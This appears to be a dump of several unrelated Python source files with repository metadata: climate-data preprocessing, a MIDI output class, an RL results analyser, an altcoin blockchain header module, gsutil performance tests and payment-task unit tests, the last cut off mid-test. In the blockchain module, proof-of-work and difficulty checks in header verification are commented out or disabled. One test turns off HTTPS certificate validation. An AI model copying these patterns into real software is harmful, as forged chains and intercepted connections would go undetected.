"[email protected]"
] | |
d600b8b2c4530936de8246363f50622650126ebf | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/concat82/62-tideGauge.py | f2b56a3028ad9bd3ebd829ae2f793963efbc05f3 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,480 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 13 10:02:00 2020
---------------------------------------------------------
This script concatenates yearly predictor files
Browses the predictor folders for the chosen TG
Concatenates the yearly csvs for the chosen predictor
Saves the concatenated csv in a separate directory
---------------------------------------------------------
@author: Michael Tadesse
"""
#%% import packages
import os
import pandas as pd
#%% define directories
home = '/lustre/fs0/home/mtadesse/erafive_localized'
out_path = '/lustre/fs0/home/mtadesse/eraFiveConcat'
#cd to the home dir to get TG information
os.chdir(home)
tg_list = os.listdir()
x = 62
y = 63
#looping through TGs
for t in range(x, y):
tg = tg_list[t]
print(tg)
#concatenate folder paths
os.chdir(os.path.join(home, tg))
#defining the folders for predictors
#choose only u, v, and slp
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp'),\
"wnd_u": os.path.join(where, 'wnd_u'),\
'wnd_v' : os.path.join(where, 'wnd_v')}
#%%looping through predictors
for pred in csv_path.keys():
os.chdir(os.path.join(home, tg))
# print(tg, ' ', pred, '\n')
#cd to the chosen predictor
os.chdir(pred)
#%%looping through the yearly csv files
count = 1
for yr in os.listdir():
print(pred, ' ', yr)
if count == 1:
dat = pd.read_csv(yr)
# print('original size is: {}'.format(dat.shape))
else:
#remove the header of the subsequent csvs before merging
# dat_yr = pd.read_csv(yr, header=None).iloc[1:,:]
dat_yr = pd.read_csv(yr)
dat_yr.shape
dat = pd.concat([dat, dat_yr], axis = 0)
# print('concatenated size is: {}'.format(dat.shape))
count+=1
print(dat.shape)
#saving concatenated predictor
#cd to the saving location
os.chdir(out_path)
#create/cd to the tg folder
try:
os.makedirs(tg)
os.chdir(tg) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(tg)
#save as csv
pred_name = '.'.join([pred, 'csv'])
dat.to_csv(pred_name)
| [
"[email protected]"
] | |
f8df77cd858240028f56eee704517225c5904b92 | 94a69d05880fdb03ad915a63f3575ff01e5df0e6 | /isobar/io/midi/output.py | fbe793950ad0b3554dc0d03d9073936ce9a6c46e | [
"MIT"
] | permissive | ideoforms/isobar | 06f2a5553b33e8185c6f9aed06224811589f7b70 | 12b03500ea882f17c3521700f7f74b0e36e4b335 | refs/heads/master | 2023-07-20T20:31:13.040686 | 2023-07-17T19:19:01 | 2023-07-17T19:19:01 | 2,155,202 | 320 | 53 | MIT | 2023-05-01T21:29:46 | 2011-08-04T15:12:03 | Python | UTF-8 | Python | false | false | 3,799 | py | import os
import mido
import logging
from ..output import OutputDevice
from ...exceptions import DeviceNotFoundException
from ...constants import MIDI_CLOCK_TICKS_PER_BEAT
log = logging.getLogger(__name__)
class MidiOutputDevice (OutputDevice):
def __init__(self, device_name=None, send_clock=False, virtual=False):
"""
Create a MIDI output device.
Use `isobar.get_midi_output_names()` to query all available devices.
Args:
device_name (str): The name of the target device to use.
The default MIDI output device name can also be specified
with the environmental variable ISOBAR_DEFAULT_MIDI_OUT.
send_clock (bool): Whether to send clock sync/reset messages.
virtual (bool): Whether to create a "virtual" rtmidi device.
"""
try:
if device_name is None:
device_name = os.getenv("ISOBAR_DEFAULT_MIDI_OUT")
self.midi = mido.open_output(device_name, virtual=virtual)
except (RuntimeError, SystemError, OSError):
raise DeviceNotFoundException("Could not find MIDI device")
self.send_clock = send_clock
log.info("Opened MIDI output: %s" % self.midi.name)
def start(self):
"""
Sends a MIDI start message to the output device.
"""
if self.send_clock:
msg = mido.Message("start")
self.midi.send(msg)
def stop(self):
"""
Sends a MIDI stop message to the output device.
"""
if self.send_clock:
msg = mido.Message("stop")
self.midi.send(msg)
@property
def ticks_per_beat(self):
"""
The number of clock ticks per beat.
For MIDI devices, which is fixed at the MIDI standard of 24.
"""
return MIDI_CLOCK_TICKS_PER_BEAT
def tick(self):
if self.send_clock:
msg = mido.Message("clock")
self.midi.send(msg)
def note_on(self, note=60, velocity=64, channel=0):
log.debug("[midi] Note on (channel = %d, note = %d, velocity = %d)" % (channel, note, velocity))
msg = mido.Message('note_on', note=int(note), velocity=int(velocity), channel=int(channel))
self.midi.send(msg)
def note_off(self, note=60, channel=0):
log.debug("[midi] Note off (channel = %d, note = %d)" % (channel, note))
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def all_notes_off(self):
log.debug("[midi] All notes off")
for channel in range(16):
for note in range(128):
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def control(self, control=0, value=0, channel=0):
log.debug("[midi] Control (channel %d, control %d, value %d)" % (channel, control, value))
msg = mido.Message('control_change', control=int(control), value=int(value), channel=int(channel))
self.midi.send(msg)
def program_change(self, program=0, channel=0):
log.debug("[midi] Program change (channel %d, program_change %d)" % (channel, program))
msg = mido.Message('program_change', program=int(program), channel=int(channel))
self.midi.send(msg)
def pitch_bend(self, pitch=0, channel=0):
log.debug("[midi] Pitch bend (channel %d, pitch %d)" % (channel, pitch))
msg = mido.Message('pitchwheel', pitch=int(pitch), channel=int(channel))
self.midi.send(msg)
def set_song_pos(self, pos=0):
msg = mido.Message('songpos', pos=pos)
self.midi.send(msg)
def __del__(self):
if hasattr(self, "midi"):
del self.midi
| [
"[email protected]"
] | |
7120668501fd24173b3eeac50a49ced2c1bd7cea | 39fbf1f554651f089dbf8478f009e38a2cbb7c25 | /RL/analyze.random-search.py | 282c8597a966b866b1b837a297a921ce6bfac83d | [
"Apache-2.0"
] | permissive | Libardo1/icnn | 20b323aed5a3975c8083fb8f6234305f8cd275d1 | 2056ca88d0b0dac4d8ee1a48a8b8a9f676bafd4f | refs/heads/master | 2021-01-20T15:23:06.016978 | 2016-08-01T19:35:32 | 2016-08-01T19:35:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,154 | py | #!/usr/bin/env python3
import argparse
import os
import sys
import shutil
from subprocess import Popen, PIPE
import json
import operator
import numpy as np
import numpy.random as npr
pythonCmd = 'python3'
rlDir = os.path.dirname(os.path.realpath(__file__))
plotSrc = os.path.join(rlDir, 'plot-all.py')
mainSrc = os.path.join(rlDir, 'src', 'main.py')
all_algs = ['DDPG', 'NAF', 'ICNN']
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--expDir', type=str, default='output.random-search')
args = parser.parse_args()
bestParams, bestVals = {}, {}
for task in os.listdir(args.expDir):
taskDir = os.path.join(args.expDir, task)
if os.path.isdir(taskDir):
bestParams[task], bestVals[task] = analyzeTask(taskDir)
orgTableP = os.path.join(args.expDir, 'table.org')
with open(orgTableP, 'w') as f:
f.write('| Task | DDPG | NAF | ICNN |\n')
f.write('|------+------+-----+------|\n')
for task, algs in sorted(bestVals.items()):
bestAlg = sorted(algs.items(), key=operator.itemgetter(1),
reverse=True)[0][0]
def getStr(alg):
s = '{:.2f} ({:.2f})'.format(algs[alg][0], int(algs[alg][1]))
if alg == bestAlg:
s = '*{}*'.format(s)
return s
f.write('| {:s} | {} | {} | {} |\n'.format(
task, getStr('DDPG'), getStr('NAF'), getStr('ICNN')))
f.flush()
print('Created {}'.format(orgTableP))
texTableP = os.path.join(args.expDir, 'table.tex')
os.system('pandoc {} --to latex --output {}'.format(orgTableP, texTableP))
for task, algs in bestParams.items():
for alg, params in algs.items():
del params['copy']
del params['env']
del params['force']
del params['gdb']
del params['gymseed']
del params['model']
del params['monitor']
del params['npseed']
del params['outdir']
del params['summary']
del params['tfseed']
del params['thread']
bestParamsP = os.path.join(args.expDir, 'bestParams.json')
with open(bestParamsP, 'w') as f:
json.dump(bestParams, f, indent=2, sort_keys=True)
print('Created {}'.format(bestParamsP))
def analyzeTask(taskDir):
bestParams = {}
bestVals = {}
print('=== {}'.format(taskDir))
with open(os.path.join(taskDir, 'analysis.txt'), 'w') as f:
for alg in all_algs:
algDir = os.path.join(taskDir, alg)
if os.path.exists(algDir):
f.write('\n=== {}\n\n'.format(alg))
exps = {}
for exp in sorted(os.listdir(algDir)):
expDir = os.path.join(algDir, exp)
testData = np.loadtxt(os.path.join(expDir, 'test.log'))
testRew = testData[:,1]
N = 10
if np.any(np.isnan(testRew)) or testRew.size <= N:
continue
testRew_ = np.array([sum(testRew[i-N:i])/N for
i in range(N, len(testRew))])
exps[exp] = [testRew_[-1], testRew_.sum()]
f.write((' + Experiment {}: Final rolling reward of {} '+
'with a cumulative reward of {}\n').format(
*([exp] + exps[exp])))
s = sorted(exps.items(), key=operator.itemgetter(1), reverse=True)
best = s[0]
bestExp = best[0]
f.write('\n--- Best of {} obtained in experiment {}\n'.format(
best[1], bestExp))
flagsP = os.path.join(algDir, bestExp, 'flags.json')
with open(flagsP, 'r') as flagsF:
f.write(flagsF.read()+'\n')
flagsF.seek(0)
flags = json.load(flagsF)
bestParams[alg] = flags
bestVals[alg] = best[1]
return bestParams, bestVals
if __name__=='__main__':
main()
| [
"[email protected]"
] | |
d3b3c31607d7dae00db90b7471be4d1ecd25d66a | cf652cb90f9d6b22b5943e7d025af631214a904d | /lib/blockchain.py | e96bbf8e40728c8ac2f4b478da933ca46f6dbed7 | [
"MIT"
] | permissive | ddude1/TestLite | 02919c68013d2ede9195d618d94260b842a5e292 | 3f3c00e4ef03dd9b23b99b02f9a8895da8d65aef | refs/heads/master | 2022-12-11T12:22:25.029101 | 2018-06-13T14:11:51 | 2018-06-13T14:11:51 | 136,489,568 | 0 | 0 | MIT | 2022-09-23T21:47:03 | 2018-06-07T14:31:31 | Python | UTF-8 | Python | false | false | 15,454 | py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2012 [email protected]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
from . import util
from . import bitcoin
from .bitcoin import *
import litecoin_scrypt
target_timespan = 24 * 60 * 60 # Xgox: 1 day
target_spacing = 3 * 60 # Xgox: 3 minute
interval = target_timespan / target_spacing # 576
max_target = 0x00000ffff0000000000000000000000000000000000000000000000000000000
START_CALC_HEIGHT = 70560
USE_DIFF_CALC = False
def bits_to_target(bits):
"""Convert a compact representation to a hex target."""
MM = 256*256*256
a = bits%MM
if a < 0x8000:
a *= 256
target = (a) * pow(2, 8 * (bits/MM - 3))
return target
def target_to_bits(target):
"""Convert a target to compact representation."""
MM = 256*256*256
c = ("%064X"%target)[2:]
i = 31
while c[0:2]=="00":
c = c[2:]
i -= 1
c = int('0x'+c[0:6],16)
if c >= 0x800000:
c /= 256
i += 1
new_bits = c + MM * i
return new_bits
def serialize_header(res):
if res.get('version') == 1:
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
#+ rev_hex(res.get('nAccumulatorCheckpoint'))
return s
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4) \
+ rev_hex(res.get('nAccumulatorCheckpoint'))
return s
def deserialize_header(s, height):
hex_to_int = lambda s: int('0x' + bh2u(s[::-1]), 16)
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['nAccumulatorCheckpoint'] = hash_encode(s[80:112])
h['block_height'] = height
return h
def hash_header(header):
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
srl_header=serialize_header(header)
return hash_encode(PoWHash(bfh(srl_header)))
blockchains = {}
def read_blockchains(config):
blockchains[0] = Blockchain(config, 0, None)
fdir = os.path.join(util.get_headers_dir(config), 'forks')
if not os.path.exists(fdir):
os.mkdir(fdir)
l = filter(lambda x: x.startswith('fork_'), os.listdir(fdir))
l = sorted(l, key = lambda x: int(x.split('_')[1]))
for filename in l:
checkpoint = int(filename.split('_')[2])
parent_id = int(filename.split('_')[1])
b = Blockchain(config, checkpoint, parent_id)
blockchains[b.checkpoint] = b
return blockchains
def check_header(header):
if type(header) is not dict:
return False
for b in blockchains.values():
if b.check_header(header):
return b
return False
def can_connect(header):
for b in blockchains.values():
if b.can_connect(header):
return b
return False
class Blockchain(util.PrintError):
"""
Manages blockchain headers and their verification
"""
def __init__(self, config, checkpoint, parent_id):
self.config = config
self.catch_up = None # interface catching up
self.checkpoint = checkpoint
self.parent_id = parent_id
self.lock = threading.Lock()
with self.lock:
self.update_size()
def parent(self):
return blockchains[self.parent_id]
def get_max_child(self):
children = list(filter(lambda y: y.parent_id==self.checkpoint, blockchains.values()))
return max([x.checkpoint for x in children]) if children else None
def get_checkpoint(self):
mc = self.get_max_child()
return mc if mc is not None else self.checkpoint
def get_branch_size(self):
return self.height() - self.get_checkpoint() + 1
def get_name(self):
return self.get_hash(self.get_checkpoint()).lstrip('00')[0:10]
def check_header(self, header):
header_hash = hash_header(header)
height = header.get('block_height')
return header_hash == self.get_hash(height)
def fork(parent, header):
checkpoint = header.get('block_height')
self = Blockchain(parent.config, checkpoint, parent.checkpoint)
open(self.path(), 'w+').close()
self.save_header(header)
return self
def height(self):
return self.checkpoint + self.size() - 1
def size(self):
with self.lock:
return self._size
def update_size(self):
p = self.path()
self._size = os.path.getsize(p)//bitcoin.NetworkConstants.HEADER_SIZE if os.path.exists(p) else 0
def verify_header(self, header, prev_header, bits, target):
prev_hash = hash_header(prev_header)
_hash = hash_header(header)
if prev_hash != header.get('prev_block_hash'):
raise BaseException("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if bitcoin.NetworkConstants.TESTNET:
return
#if bits != header.get('bits'):
# raise BaseException("bits mismatch: %s vs %s" % (bits, header.get('bits')))
#if int('0x' + _hash, 16) > target:
# raise BaseException("insufficient proof of work: %s vs target %s" % (int('0x' + _hash, 16), target))
if USE_DIFF_CALC:
if header.get('block_height', 0) > START_CALC_HEIGHT:
assert bits == header.get('bits'), "bits mismatch: %s vs %s" \
% (bits, header.get('bits'))
_hash = self.hash_header(header)
assert int('0x' + _hash, 16) <= target, \
"insufficient proof of work: %s vs target %s" % \
(int('0x' + _hash, 16), target)
def verify_chunk(self, index, data):
num = len(data) // bitcoin.NetworkConstants.HEADER_SIZE
prev_header = None
if index != 0:
prev_header = self.read_header(index * 2016 - 1)
chain = []
for i in range(num):
raw_header = data[i*bitcoin.NetworkConstants.HEADER_SIZE:(i+1) * bitcoin.NetworkConstants.HEADER_SIZE]
header = deserialize_header(raw_header, index*2016 + i)
height = index*2016 + i
header['block_height'] = height
chain.append(header)
bits, target = self.get_target(height, chain)
self.verify_header(header, prev_header, bits, target)
prev_header = header
def path(self):
d = util.get_headers_dir(self.config)
filename = 'blockchain_headers' if self.parent_id is None else os.path.join('forks', 'fork_%d_%d'%(self.parent_id, self.checkpoint))
return os.path.join(d, filename)
def save_chunk(self, index, chunk):
filename = self.path()
d = (index * 2016 - self.checkpoint) * bitcoin.NetworkConstants.HEADER_SIZE
if d < 0:
chunk = chunk[-d:]
d = 0
self.write(chunk, d)
self.swap_with_parent()
def swap_with_parent(self):
if self.parent_id is None:
return
parent_branch_size = self.parent().height() - self.checkpoint + 1
if parent_branch_size >= self.size():
return
self.print_error("swap", self.checkpoint, self.parent_id)
parent_id = self.parent_id
checkpoint = self.checkpoint
parent = self.parent()
with open(self.path(), 'rb') as f:
my_data = f.read()
with open(parent.path(), 'rb') as f:
f.seek((checkpoint - parent.checkpoint)*bitcoin.NetworkConstants.HEADER_SIZE)
parent_data = f.read(parent_branch_size*bitcoin.NetworkConstants.HEADER_SIZE)
self.write(parent_data, 0)
parent.write(my_data, (checkpoint - parent.checkpoint)*bitcoin.NetworkConstants.HEADER_SIZE)
# store file path
for b in blockchains.values():
b.old_path = b.path()
# swap parameters
self.parent_id = parent.parent_id; parent.parent_id = parent_id
self.checkpoint = parent.checkpoint; parent.checkpoint = checkpoint
self._size = parent._size; parent._size = parent_branch_size
# move files
for b in blockchains.values():
if b in [self, parent]: continue
if b.old_path != b.path():
self.print_error("renaming", b.old_path, b.path())
os.rename(b.old_path, b.path())
# update pointers
blockchains[self.checkpoint] = self
blockchains[parent.checkpoint] = parent
def write(self, data, offset):
filename = self.path()
with self.lock:
with open(filename, 'rb+') as f:
if offset != self._size*bitcoin.NetworkConstants.HEADER_SIZE:
f.seek(offset)
f.truncate()
f.seek(offset)
f.write(data)
f.flush()
os.fsync(f.fileno())
self.update_size()
def save_header(self, header):
height = header.get('block_height')
delta = height - self.checkpoint
srl_header = serialize_header(header)
if header.get('block_height') == 0:
srl_header+="0000000000000000000000000000000000000000000000000000000000000000"
data = bfh(srl_header)
assert delta == self.size()
header_size = bitcoin.NetworkConstants.HEADER_SIZE
#if header.get('block_height') == 0:
# header_size = 80
assert len(data) == header_size
self.write(data, delta*header_size)
self.swap_with_parent()
def read_header(self, height):
assert self.parent_id != self.checkpoint
if height < 0:
return
if height < self.checkpoint:
return self.parent().read_header(height)
if height > self.height():
return
delta = height - self.checkpoint
header_size = bitcoin.NetworkConstants.HEADER_SIZE #if not height else 80
name = self.path()
if os.path.exists(name):
with open(name, 'rb') as f:
f.seek(delta * header_size)
h = f.read(header_size)
return deserialize_header(h, height)
def get_hash(self, height):
return hash_header(self.read_header(height))
def get_target_dgw(self, block_height, chain=None):
if chain is None:
chain = []
last = self.read_header(block_height-1)
if last is None:
for h in chain:
if h.get('block_height') == block_height-1:
last = h
# params
BlockLastSolved = last
BlockReading = last
nActualTimespan = 0
LastBlockTime = 0
PastBlocksMin = 24
PastBlocksMax = 24
CountBlocks = 0
PastDifficultyAverage = 0
PastDifficultyAveragePrev = 0
bnNum = 0
if BlockLastSolved is None or block_height-1 < PastBlocksMin:
return target_to_bits(max_target), max_target
for i in range(1, PastBlocksMax + 1):
CountBlocks += 1
if CountBlocks <= PastBlocksMin:
if CountBlocks == 1:
PastDifficultyAverage = bits_to_target(BlockReading.get('bits'))
else:
bnNum = bits_to_target(BlockReading.get('bits'))
PastDifficultyAverage = ((PastDifficultyAveragePrev * CountBlocks)+(bnNum)) / (CountBlocks + 1)
PastDifficultyAveragePrev = PastDifficultyAverage
if LastBlockTime > 0:
Diff = (LastBlockTime - BlockReading.get('timestamp'))
nActualTimespan += Diff
LastBlockTime = BlockReading.get('timestamp')
BlockReading = self.read_header((block_height-1) - CountBlocks)
if BlockReading is None:
for br in chain:
if br.get('block_height') == (block_height-1) - CountBlocks:
BlockReading = br
bnNew = PastDifficultyAverage
nTargetTimespan = CountBlocks * target_spacing
nActualTimespan = max(nActualTimespan, nTargetTimespan/3)
nActualTimespan = min(nActualTimespan, nTargetTimespan*3)
# retarget
bnNew *= nActualTimespan
bnNew /= nTargetTimespan
bnNew = min(bnNew, max_target)
new_bits = target_to_bits(bnNew)
return new_bits, bnNew
def get_target(self, height, chain=None):
if chain is None:
chain = [] # Do not use mutables as default values!
if height == 0 or not USE_DIFF_CALC:
return target_to_bits(max_target), max_target
if height > START_CALC_HEIGHT:
return self.get_target_dgw(height, chain)
def can_connect(self, header, check_height=True):
height = header['block_height']
if check_height and self.height() != height - 1:
return False
if height == 0:
return hash_header(header) == bitcoin.NetworkConstants.GENESIS
previous_header = self.read_header(height -1)
if not previous_header:
return False
prev_hash = hash_header(previous_header)
if prev_hash != header.get('prev_block_hash'):
return False
bits, target = self.get_target(height // 2016)
try:
self.verify_header(header, previous_header, bits, target)
except:
return False
return True
def connect_chunk(self, idx, hexdata):
try:
data = bfh(hexdata)
self.verify_chunk(idx, data)
#self.print_error("validated chunk %d" % idx)
self.save_chunk(idx, data)
return True
except BaseException as e:
self.print_error('verify_chunk failed', str(e))
return False
| [
"[email protected]"
] | |
1e12863ed3a72096532a03ece32b12e9211e3a96 | a59d55ecf9054d0750168d3ca9cc62a0f2b28b95 | /platform/gsutil/gslib/tests/test_perfdiag.py | 154b60919fd93d78dc4900e94ebc93c1dbbbc19d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bopopescu/google-cloud-sdk | bb2746ff020c87271398196f21a646d9d8689348 | b34e6a18f1e89673508166acce816111c3421e4b | refs/heads/master | 2022-11-26T07:33:32.877033 | 2014-06-29T20:43:23 | 2014-06-29T20:43:23 | 282,306,367 | 0 | 0 | NOASSERTION | 2020-07-24T20:04:47 | 2020-07-24T20:04:46 | null | UTF-8 | Python | false | false | 4,129 | py | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for perfdiag command."""
import socket
import gslib.tests.testcase as testcase
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import unittest
from gslib.util import IS_WINDOWS
class TestPerfDiag(testcase.GsUtilIntegrationTestCase):
"""Integration tests for perfdiag command."""
# We want to test that perfdiag works both when connecting to the standard gs
# endpoint, and when connecting to a specific IP or host while setting the
# host header. For the 2nd case we resolve storage.googleapis.com to a
# specific IP and connect to that explicitly.
_gs_ip = socket.gethostbyname('storage.googleapis.com')
_custom_endpoint_flags = [
'-o', 'Credentials:gs_host=' + _gs_ip,
'-o', 'Credentials:gs_host_header=storage.googleapis.com',
# TODO: gsutil-beta: Add host header support for JSON
'-o', 'Boto:https_validate_certificates=False']
def test_latency(self):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', '1', '-t', 'lat', suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def _run_basic_wthru_or_rthru(self, test_name, num_processes, num_threads):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', str(num_processes * num_threads),
'-s', '1024', '-c', str(num_processes),
'-k', str(num_threads), '-t', test_name, suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def test_write_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 2)
def test_read_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 2)
def test_input_output(self):
outpath = self.CreateTempFile()
bucket_uri = self.CreateBucket()
self.RunGsUtil(['perfdiag', '-o', outpath, '-n', '1', '-t', 'lat',
suri(bucket_uri)])
self.RunGsUtil(['perfdiag', '-i', outpath])
def test_invalid_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', 'foo', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Invalid -s', stderr)
def test_toobig_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', '3pb', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Maximum throughput file size', stderr)
def test_listing(self):
bucket_uri = self.CreateBucket()
stdout = self.RunGsUtil(
['perfdiag', '-n', '1', '-t', 'list', suri(bucket_uri)],
return_stdout=True)
self.assertIn('Number of listing calls made:', stdout)
| [
"[email protected]"
] | |
87a8b29f0f025d84e48f78bd24494c4f37bfcd95 | 79f284d1e8ecd2a4e65c09bbaa3c7f4462e72401 | /liqpay_int/tests/tasks/test_process_payment_complaint_patch.py | eb9b113adad57e7431ac268e9639997f1abf9da3 | [] | no_license | ProzorroUKR/prozorro_tasks | 9ed62c40dbd5b631e3ff7357e89194e8deb20e05 | e948f8860b0b7ef6d8d7de042cf08d73c5250ba2 | refs/heads/master | 2023-06-22T14:44:33.473461 | 2023-05-15T12:07:43 | 2023-05-15T12:07:43 | 163,171,499 | 4 | 1 | null | 2023-05-01T21:27:21 | 2018-12-26T11:15:44 | Python | UTF-8 | Python | false | false | 10,556 | py | import unittest
import requests
from unittest.mock import patch, Mock, call, ANY
from celery.exceptions import Retry
from environment_settings import DEFAULT_RETRY_AFTER
from liqpay_int.tasks import process_payment_complaint_patch
from payments.message_ids import (
PAYMENTS_PATCH_COMPLAINT_EXCEPTION,
PAYMENTS_PATCH_COMPLAINT_CODE_ERROR,
PAYMENTS_PATCH_COMPLAINT_PENDING_SUCCESS,
PAYMENTS_PATCH_COMPLAINT_NOT_PENDING_SUCCESS,
)
class TestHandlerCase(unittest.TestCase):
def test_handle_connection_error(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
patch_data = {"patch_test_field": "patch_test_value"}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.side_effect = requests.exceptions.ConnectionError()
process_payment_complaint_patch.retry = Mock(side_effect=Retry)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_EXCEPTION, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=DEFAULT_RETRY_AFTER,
exc=requests_mock.patch.side_effect
)
def test_handle_429_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
ret_aft = 13
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=429,
cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={"Retry-After": ret_aft}
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=ret_aft
)
def test_handle_412_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=412,
cookies=Mock(get_dict=Mock(return_value=cookies))
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=0,
kwargs=dict(
payment_data=payment_data,
complaint_params=complaint_params,
patch_data=patch_data,
cookies=cookies,
)
)
def test_handle_500_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=500,
